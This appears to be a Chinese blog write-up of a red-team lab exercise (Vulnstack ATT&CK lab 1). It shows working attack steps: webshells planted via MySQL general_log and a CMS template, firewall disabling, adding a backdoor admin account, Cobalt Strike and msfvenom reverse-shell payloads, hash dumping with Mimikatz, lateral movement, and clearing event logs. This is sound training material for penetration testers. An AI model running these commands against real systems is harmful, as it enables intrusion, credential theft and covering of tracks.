<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="ATT&amp;CK实战系列——红队实战（一）, 秋刀鱼-">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>ATT&amp;CK实战系列——红队实战（一） | 秋刀鱼-</title>
    <link rel="icon" type="image/png" href="https://pic.imgdb.cn/item/650ea58ec458853aef09a148.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="秋刀鱼-" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/avatar.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">秋刀鱼-</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/avatar.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">秋刀鱼-</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/18.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">ATT&amp;CK实战系列——红队实战（一）</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Hongri/">
                                <span class="chip bg-color">Hongri</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E9%9D%B6%E6%9C%BA/" class="post-category">
                                靶机
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-11-17
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.3k
                </div>
                

                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <meta name="referrer" content="no-referrer" />

<blockquote>
<p>靶场地址：<a target="_blank" rel="noopener" href="http://vulnstack.qiyuanxuetang.net/vuln/detail/2/">http://vulnstack.qiyuanxuetang.net/vuln/detail/2/</a></p>
<p>开机密码：hongrisec@2019</p>
<p>进入环境后要先改系统密码</p>
</blockquote>
<h1 id="网络拓扑"><a href="#网络拓扑" class="headerlink" title="网络拓扑"></a>网络拓扑</h1><p><img src="https://img-blog.csdnimg.cn/img_convert/054c4f73a72cad1293e4e86b21c30eee.png" alt="image-20231116210021237"></p>
<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><p>先将 server2003 和 server2008 两台主机都设置为自定义<code>VMnet1</code></p>
<p><code>VMnet1</code>仅主机模式的子网地址改为<code>192.168.52.0</code></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/ee2123e51532a075605e3969fa6ef67e.png" alt="image-20231116205828798"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/914dcdc1dd835b966f628a46116fe2d2.png" alt="image-20231116205910294"></p>
<p>Win7添加一块网卡，一块是<code>NAT模式</code>，另一块是<code>VMnet1仅主机模式</code></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/8b24104ffdeee13da58036f9775878ef.png" alt="image-20231116210210767"></p>
<p><strong>IP地址：</strong></p>
<pre><code>win7:  192.168.52.128           10.9.75.6
2008:  192.168.52.138
2003:  192.168.52.141
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/582091de096cb79cb66ef4ed9db0b7de.png" alt="image-20231116211457145"></p>
<p>启动Win7的Web服务</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/25bbc9f5a2cfde4710db0e17326af7de.png" alt="image-20231116214619121"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/0c3807341e8ba45efd8a73a8eca28068.png" alt="image-20231116214630456"></p>
<h1 id="外网渗透"><a href="#外网渗透" class="headerlink" title="外网渗透"></a>外网渗透</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><pre><code>nmap --min-rate 1000 10.9.75.6
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/d19191914bdcad112dd0129ff57a323d.png" alt="image-20231116220159122"></p>
<pre class=" language-bash"><code class="language-bash"><span class="token function">sudo</span> nmap -sT -sV  -sC -O -p 80,3306 10.9.75.6
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/0e3a599a09db05f0f861084513c41c47.png" alt="image-20231116220453013"></p>
<pre class=" language-bash"><code class="language-bash"><span class="token function">sudo</span> nmap --script<span class="token operator">=</span>vuln -p 3306,80 10.9.75.6
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/87ddb09d4d9904dcab4f904046f07ade.png" alt="image-20231116220724223"></p>
<h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p>御剑后台扫描工具</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/3a7460209613e2fcbb44177d0a8c3365.png" alt="image-20231116224108915"></p>
<p>访问80端口</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/c596fd999a08e143a0519353b89a87c9.png" alt="image-20231116222449223"></p>
<p>知道了网站的绝对路径<code>C:/phpStudy/WWW</code></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/c392f96f667154a7701339098e9b0eca.png" alt="image-20231116220914234"></p>
<p>存在<code>root:root</code>弱口令</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/9c76f7f5dc0cf8143ae7fec441b82330.png" alt="image-20231116220938300"></p>
<p>访问<code>phpMyAdmin</code></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/bfbab53f7ca05816ff647f16bf40c833.png" alt="image-20231116221034913"></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="phpmyadmin拿shell"><a href="#phpmyadmin拿shell" class="headerlink" title="phpmyadmin拿shell"></a>phpmyadmin拿shell</h3><h4 id="general-log-file写一句话"><a href="#general-log-file写一句话" class="headerlink" title="general_log_file写一句话"></a>general_log_file写一句话</h4><p>尝试能不能通过这个数据库管理页面写一句话，拿WebShell</p>
<pre class=" language-sql"><code class="language-sql"><span class="token keyword">SHOW</span> <span class="token keyword">GLOBAL</span> VARIABLES <span class="token operator">LIKE</span> <span class="token string">"%secure%"</span>
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/a20b6b18d5e512c66c2661df468e1af9.png" alt="image-20231116221316417"></p>
<p>说明不能通过<code>into outfile</code>来写一句话</p>
<p>查看<code>general_log</code>是否开启</p>
<pre><code>show global variables like &quot;%general%&quot;
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/30c9061628089ba8fc94d188e7e2f6d9.png" alt="image-20231116221541129"></p>
<p>开启<code>general_log</code></p>
<pre class=" language-sql"><code class="language-sql"><span class="token keyword">set</span> <span class="token keyword">global</span> general_log<span class="token operator">=</span><span class="token string">"on"</span><span class="token punctuation">;</span>
</code></pre>
<p>再次查询,此时日志功能就开启了</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/5ac27632463822cd539bab43d5f35243.png" alt="image-20231116221634860"></p>
<p>可以通过<code>general_log_file</code>指定为一个<code>php</code>后缀的文件，来写查询语句</p>
<pre class=" language-sql"><code class="language-sql"><span class="token keyword">set</span> <span class="token keyword">global</span> general_log_file<span class="token operator">=</span><span class="token string">"C:\\phpstudy\\www\\shell.php"</span><span class="token punctuation">;</span>
</code></pre>
<pre class=" language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token string">"&lt;?php  @eval($_REQUEST[6868])?>"</span><span class="token punctuation">;</span>
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/7962b2b1beeeaaa94cb841571cabc6e6.png" alt="image-20231116221953362"></p>
<h4 id="蚁剑连接"><a href="#蚁剑连接" class="headerlink" title="蚁剑连接"></a>蚁剑连接</h4><p><img src="https://img-blog.csdnimg.cn/img_convert/90a8e7946c15b38b68a55fa2bb524e14.png" alt="image-20231116222258539"></p>
<p>进入文件管理，发现一个<code>beifen.rar</code>备份文件</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/e3956cc3b21dda432854886eb4aa5c6a.png" alt="image-20231116224229009"></p>
<p>下载到kali本地，然后解压</p>
<pre class=" language-bash"><code class="language-bash"><span class="token function">rar</span> x beifen.rar
</code></pre>
<blockquote>
<p> <strong>rar</strong></p>
<p> 解压：rar x FileName.rar</p>
<p> 压缩：rar e FileName.rar</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/img_convert/532df33819830f6f691274f08a673873.png" alt="image-20231116224554249"></p>
<h3 id="网站后台拿shell"><a href="#网站后台拿shell" class="headerlink" title="网站后台拿shell"></a>网站后台拿shell</h3><p><a target="_blank" rel="noopener" href="http://10.9.75.6/yxcms/">http://10.9.75.6/yxcms/</a></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/0e434bdb851d8ef7fbd4cfeda8feb4e7.png" alt="image-20231116225127725"></p>
<p><a target="_blank" rel="noopener" href="http://10.9.75.6/yxcms/index.php?r=admin">http://10.9.75.6/yxcms/index.php?r=admin</a></p>
<p>登陆网站后台</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/5b62f8fa2f2273a0d1d0cc17af269166.png" alt="image-20231116225248366"></p>
<p>新建前台模板，写一句话</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/0573df0d0fe75ebfd6761b5ac010351e.png" alt="image-20231116225432087"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/a82bc0d92a0c3684a50be78382443d47.png" alt="image-20231116225452192"></p>
<pre><code>&lt;?php @eval($_POST[&#39;cmd&#39;])?&gt;; 
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/249e2ea87ef37f7d1fb01b0b9e1f8a38.png" alt="image-20231116230608453"></p>
<p>在拿到的备份文件中，找到模板的上传点</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/6709081a74682ee7b2af0d6bb89af386.png" alt="image-20231116225907521"></p>
<p><a target="_blank" rel="noopener" href="http://10.9.75.6/yxcms/protected/apps/default/view/default/">http://10.9.75.6/yxcms/protected/apps/default/view/default/</a></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/84f97fc297c217b6278e4e3a00df422a.png" alt="image-20231116230055297"></p>
<p>访问webshell.php</p>
<p><a target="_blank" rel="noopener" href="http://10.9.75.6/yxcms/protected/apps/default/view/default/webshell.php">http://10.9.75.6/yxcms/protected/apps/default/view/default/webshell.php</a></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/0ad3eec38c952b7e8a8749a1e927de9c.png" alt="image-20231116230524622"></p>
<h3 id="关闭防火墙"><a href="#关闭防火墙" class="headerlink" title="关闭防火墙"></a>关闭防火墙</h3><pre class=" language-bash"><code class="language-bash">netsh advfirewall show allprofile state     （显示防火墙）

netsh advfirewall <span class="token keyword">set</span> allprofiles state off （关闭防火墙）
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/185606237c0f46538c640e9a6c447eb4.png" alt="image-20231117132031804"></p>
<h3 id="新建用户，开启3389"><a href="#新建用户，开启3389" class="headerlink" title="新建用户，开启3389"></a>新建用户，开启3389</h3><pre class=" language-bash"><code class="language-bash">net user saury 123.com /add <span class="token comment" spellcheck="true"># 添加账户密码</span>
net localgroup administrators saury /add  <span class="token comment" spellcheck="true"># 添加为管理员权限</span>
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/ac9570e40bd873f241cc1dfa3d339c0b.png" alt="image-20231117132145236"></p>
<pre class=" language-bash"><code class="language-bash">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal<span class="token string">" "</span>Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 
<span class="token comment" spellcheck="true"># 开启3389端口</span>
</code></pre>
<p>如果防火墙没关,rdp会登录失败</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/9bc555cda87b905fef14c3f4f52dbdad.png" alt="image-20231117132242981"></p>
<h1 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h1><h2 id="（一）CS"><a href="#（一）CS" class="headerlink" title="（一）CS"></a>（一）CS</h2><h3 id="CS木马上线"><a href="#CS木马上线" class="headerlink" title="CS木马上线"></a>CS木马上线</h3><p>kali既充当CS服务端，也充当CS客户端</p>
<p><strong>启动服务端</strong></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/b066399de2d826c34d979bd4cbbf3d3e.png" alt="image-20231117133052571"></p>
<p><strong>客户端连接</strong></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/341fed94211ba1dae2ebd91385231316.png" alt="image-20231117133157944"></p>
<p><strong>开启监听</strong></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/a6aa048457c7e918a2d31baaa24e5410.png" alt="image-20231117133251390"></p>
<p><strong>生成木马</strong></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/83030e1251038c66b5809a014a2a6969.png" alt="image-20231117133321801"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/2fb14eb78629d9b24c5e3ff58191b9b6.png" alt="image-20231117133342718"></p>
<p>点击<code>Generate</code>生成木马<code>artifact_x64.exe</code>，保存到 一个位置</p>
<p><strong>木马上线</strong></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/c8fce96b564b4a493081e0f6c174cd91.png" alt="image-20231117133551853"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/739b529cf77b834e2c14bd0e624ed7ce.png" alt="image-20231117133704737"></p>
<p>执行完木马文件后，CS木马就上线了</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/e7a35282be29cef0def9e98772180d89.png" alt="image-20231117133734929"></p>
<p>目标上线之后，我们第一步首先要做的就是先将睡眠时间设置为0</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/b8feadb314d5ee2823eedea6f38f4317.png" alt="image-20231117134908657"></p>
<p>在会话交互框中输入命令：<code>sleep 0</code>，将睡眠时间设置为0</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/c917aff829f7c8ae8544ff005e1f6595.png" alt="image-20231117135003535"></p>
<p>在会话交互框中输入shell whoami可以瞬间得到如下所示的回显，说明睡眠时间设置为0完成</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/084c04622070654e40d610117927852d.png" alt="image-20231117135042657"></p>
<h3 id="信息收集-1"><a href="#信息收集-1" class="headerlink" title="信息收集"></a>信息收集</h3><p>一些CS内网信息收集的命令</p>
<pre class=" language-bash"><code class="language-bash">shell <span class="token function">whoami</span>                //显示administrator权限
shell systeminfo            //查看系统信息
shell ipconfig /all         //查看是否存在域

shell net <span class="token function">time</span> /domain          //获取当前域控制器的时间 输入该命令可能存在如下三种情况：存在域，当前用户不是域用户；存在域，当前用户是域用户；不存在域。

shell net view /domain      //查看所有域

shell nbtbios               //快速探测内网

shell net group <span class="token string">"domain computers"</span> /domain  //查看域控制器主机名

shell nltest /domain_trusts //查看域信任关系

shell net accounts /domain  //查看域内账号密码信息

shell nltest /dclist:hacker //查看当前域的域控制器
shell net group <span class="token string">"Domain Controllers"</span> /domain        //获取域控制器列表
shell net group <span class="token string">"Domain Admins"</span> /domain             //获取域管理员列表
shell Tasklist /v            //列出进程和进程用户
</code></pre>
<pre><code>shell systeminfo   
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/b12f0bf0cc1a9022d85cd0b644feeb8b.png" alt="image-20231117142524768"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/98bc4188222bc3f8c28e64faf91c66e7.png" alt="image-20231117142818741"></p>
<p>查看域中的机器</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/13c74c1c433b124a6295974472c7eedd.png" alt="image-20231117142928435"></p>
<h4 id="hashdump"><a href="#hashdump" class="headerlink" title="hashdump"></a>hashdump</h4><p><img src="https://img-blog.csdnimg.cn/img_convert/684aa6b31c705d4b3e8d8e19ad93277c.png" alt="image-20231117143044466"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/d382f1bf556df4c4cc65477dcde542f5.png" alt="image-20231117143026831"></p>
<h4 id="Mimikatz抓取明文密码"><a href="#Mimikatz抓取明文密码" class="headerlink" title="Mimikatz抓取明文密码"></a>Mimikatz抓取明文密码</h4><p><img src="https://img-blog.csdnimg.cn/img_convert/f4552e46f2bfa3b6947818055f1c19c4.png" alt="image-20231117143107613"></p>
<p>或者直接输入命令也可以执行<code>logonpasswords</code></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/8f298ef668637eb08d9ceea5a0d3e59d.png" alt="image-20231117143230272"></p>
<h3 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h3><p>利用<code>ms15-051</code></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/dbc6cc10bf57cfe2253faebbd6419a0d.png" alt="image-20231117143914090"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/9cf038718cad8f24b24471c54f888c6f.png" alt="image-20231117143946074"></p>
<p>将win7提成SYSTEM权限</p>
<h3 id="横向移动"><a href="#横向移动" class="headerlink" title="横向移动"></a>横向移动</h3><p>通过 Win7 跳板机，横向渗透拿下内网域内的域成员主机和域控主机</p>
<p>新建一个SMB监听器</p>
<blockquote>
<p>SMB Beacon使用命名管道通过父级Beacon进行通讯，当两个Beacons链接后，子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB beacon相对隐蔽。SMB beacon不能直接生成可用载荷, 只能使用<code> psexec</code> 或<code>Stageless Payload</code>上线</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/img_convert/164d00f6869cc006472db45f751564ab.png" alt="image-20231117144046566"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/7063f4bc1ed86e78fe881d53d657d843.png" alt="image-20231117144320333"></p>
<p>拿下域控 主机</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/a7cd019e5fc42915d758f37ddf1dffff.png" alt="image-20231117144353531"></p>
<p>看到<code>∞∞</code>这个字符 ，这就是派生的SMB Beacon</p>
<p>查看其IP地址</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/4dff4636d3aef1bac61e1d679c63db6f.png" alt="image-20231117144708264"></p>
<p>再次通过拿下的域控拿下其他域成员机</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/4e918440fbaf2902a6843a8916379214.png" alt="image-20231117144435804"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/68dc346749f724b7dc91652f0b47687c.png" alt="image-20231117144514033"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/8b71329561c11b074b7c9146ae3d68f8.png" alt="image-20231117144522649"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/27e864a095b259c6adfdf0306ddff8f1.png" alt="image-20231117144739019"></p>
<p>横向成功！！！</p>
<h3 id="CS痕迹清楚"><a href="#CS痕迹清楚" class="headerlink" title="CS痕迹清楚"></a>CS痕迹清楚</h3><p>根据入侵的路径依次删除上传的工具、删除Web日志、FTP日志等。</p>
<p>清除安全日志</p>
<pre><code>shell wevtutil cl Security
</code></pre>
<p>清除系统日志，</p>
<pre><code>shell wevtutil cl System
</code></pre>
<p>清除应用日志</p>
<pre><code>shell wevtutil cl Application
</code></pre>
<p>清除启动日志</p>
<pre><code>shell wevtutil cl Setup
</code></pre>
<p>清除RDP登录日志</p>
<pre class=" language-bash"><code class="language-bash">shell wevtutil epl Security C:\Windows\System32\winevt\Logs\Security_new.evtx /q:<span class="token string">"*[EventData[(Data[@Name='IpAddress']!='127.0.0.1')]]"</span> /ow:true 
</code></pre>
<p>删除防火墙日志</p>
<pre><code>shell del C:\Windows\System32\LogFiles\Firewall\pfirewall.log
</code></pre>
<p>删除PowerShell执行历史记录</p>
<pre class=" language-bash"><code class="language-bash">shell del 
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
</code></pre>
<h2 id="（二）MSF"><a href="#（二）MSF" class="headerlink" title="（二）MSF"></a>（二）MSF</h2><h3 id="msf木马上线"><a href="#msf木马上线" class="headerlink" title="msf木马上线"></a>msf木马上线</h3><p>制作msf木马</p>
<pre class=" language-bash"><code class="language-bash">msfvenom -p windows/meterpreter/reverse_tcp LHOST<span class="token operator">=</span>your-IP LPORT<span class="token operator">=</span>your-PORT -f exe -o /home/kali/tmp/shell.exe
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/ef0f3e4aa0e335fb2fa53d738ec09f09.png" alt="image-20231117152202589"></p>
<p>开启msf监听</p>
<pre class=" language-bash"><code class="language-bash">use exploit/multi/handler
<span class="token keyword">set</span> payload windows/meterpreter/reverse_tcp
<span class="token keyword">set</span> lhost 10.9.75.3
<span class="token keyword">set</span> lport 4567
run
</code></pre>
<p>通过蚁剑将生成的木马上传并运行</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/d40ed33c514ee9ef1a58838bdf2c072e.png" alt="image-20231117152740528"></p>
<p>木马成功上线，进行system提权</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/9a4b64ea90c43a95ca4cde9aec4b0ee5.png" alt="image-20231117152837225"></p>
<h3 id="信息收集-2"><a href="#信息收集-2" class="headerlink" title="信息收集"></a>信息收集</h3><p>首先获取目标主机的shell</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/a125ec76b5dd71606f8e378b68bd6e23.png" alt="image-20231117152945711"></p>
<p>出现乱码，可以使用<code>chcp 65001</code>解决乱码问题</p>
<p><strong>查看路由表</strong></p>
<pre class=" language-bash"><code class="language-bash">route print
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/3f6e1411a806c4b4d8f58919a6272fac.png" alt="image-20231117153317504"></p>
<p>可以看出内网网段是<code>192.168.52.0/24</code></p>
<p><strong>查看系统信息</strong></p>
<pre class=" language-bash"><code class="language-bash">systeminfo
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/c335d69b8cd087207f956cda194f6be7.png" alt="image-20231117154912163"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/ed85341c0234921038290f218e716853.png" alt="image-20231117154958667"></p>
<p><strong>查看是否在域内</strong></p>
<pre class=" language-bash"><code class="language-bash">ipconfig /all
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/1ea3412121f9585631f9dafa8c866101.png" alt="image-20231117153434469"></p>
<pre class=" language-bash"><code class="language-bash">net view /domain  <span class="token comment" spellcheck="true">#查询当前主机是否加入域，如果加入则列出域名</span>
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/66694420d58efbbffc66049d5fa7ab3d.png" alt="image-20231117153639092"></p>
<pre class=" language-bash"><code class="language-bash">net view //查看域内主机
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/ff53e02aaac82fc6a3222da0dad97456.png" alt="image-20231117154648700"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/13ac223e521372177541cc2111da53f6.png" alt="image-20231117155112423"></p>
<p>得到域内其他主机地址</p>
<ul>
<li>OWA：<strong>192.168.52.138</strong></li>
<li>ROOT-TVI862UBEH：<strong>192.168.52.141</strong></li>
</ul>
<p><strong>查看域内用户</strong></p>
<pre class=" language-bash"><code class="language-bash">net user /domain
</code></pre>
<p><strong>获取主机用户密码哈希</strong></p>
<pre class=" language-bash"><code class="language-bash">hashdump
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/d7fd20d29d2b2cfb13543ef2cf756d6b.png" alt="image-20231117155419379"></p>
<blockquote>
<p>用户哈希数据的输出格式为：</p>
<pre class=" language-shell"><code class="language-shell">用户名:SID:LM哈希:NTLM哈希:::
</code></pre>
</blockquote>
